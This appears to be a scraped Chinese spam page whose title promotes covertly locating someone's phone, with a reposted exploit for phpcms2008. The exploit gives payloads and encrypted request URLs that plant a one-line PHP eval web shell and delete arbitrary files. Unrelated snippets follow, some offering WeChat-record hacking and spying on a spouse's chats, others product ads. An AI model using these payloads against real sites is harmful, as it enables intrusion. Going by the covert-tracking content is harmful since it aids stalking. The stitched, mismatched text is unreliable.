不被对方察觉手机定位,手机号定位对方位置

访客4年前黑客工具713

发布日期:2011-05.04
发布作者:c4rp3nt3r

影响版本:phpcms2008 sp2 or sp4
官方地址:http://www.phpcms.cn

漏洞类型:文件包含
漏洞描述:phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制,导致能拿shell的 *** 很多,类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。

公布一个本地包含秒杀拿shell的 *** 。

包含:admin/safe.inc.php文件GET提交一下数据
将在根目录下生成一句话
用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';
加密如下字符串

$evil='i=1&m=1&f= *** &action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJK *** kxHgoddBUBBhIwBA0II3AlAAAB *** UWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=


将在根目录下生成一句话木马

同理任意文件删除漏洞:
$evil='i=1&m=1&f= *** &action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJK *** kxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0 *** HhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==

参考:Flyh4t [PhpCMS]一个漏洞的二次利用

详细说明:

贴上存在漏洞的代码

复制代码

相关文章

eml文件怎么打开(邮箱里的eml格式文件怎么打开)

eml是一种邮件的格式,但有时不可以开启,那如何把它开启喃,下边是流程。 操作步骤 01第一种:先打开自己的QQ邮箱。寻找寄信,点进来。 02点进来后收货人那边写自身电子邮箱的账户。随后点一下添加附件...

世界黑客榜,能查微信记录的黑客,哪有黑客网站

"default_title": "Qrcode", "default_locale": "en", // 默许言语};sbit LED_7 = P1^7; LED7 = 1; report.wr...

怎么样查老公和别人聊天记录(想查老公的微信聊天记录)

如何查丈夫和他人微信聊天记录(想查丈夫的微信聊天纪录)我微信朋友圈有很多人逐渐去玩抖音短视频,大潘就添加了她们精兵,前些日子大潘又画妆又脱衣服又装腔作势又妩媚动人总算拍了一个视频,結果关注点赞才2个,...

婴儿牛奶润肤露什么牌子好

你们知道吗?60%的宝宝都是干性皮肤。宝宝的皮肤天生娇嫩,细胞间隔大,皮脂含量较少,因此皮肤水分的份的流逝速度比成人快2倍,通常会呈现比较干燥的状态,所以更需要增强肌肤屏障,及时补水保湿。所以就需要婴...

活动策划案例有哪些,运营攻略大全!

活动策划案例有哪些,运营攻略大全!

大家好,我是菠菜,菠菜今天给大家分享的是活动策划方案大全,这也是菠菜珍藏的资源哦 相信无论在生活还是学习上,老师和boss都会给我们出一个难题,就是让我们自己做出一个策划案,比如举办一个校园活动,我...

普鑫智能锁价格怎么样

普鑫智能锁价格怎么样

  跟着智能锁的快速成长,市面上呈现各类百般的品牌。各人也对智能锁也是不怎么稀奇了,逐渐的进入每个家庭。所以此刻最体贴的就是价值。那么接下来小编就为各人讲一下普鑫智能锁价值!普鑫指纹锁的价值  PUX...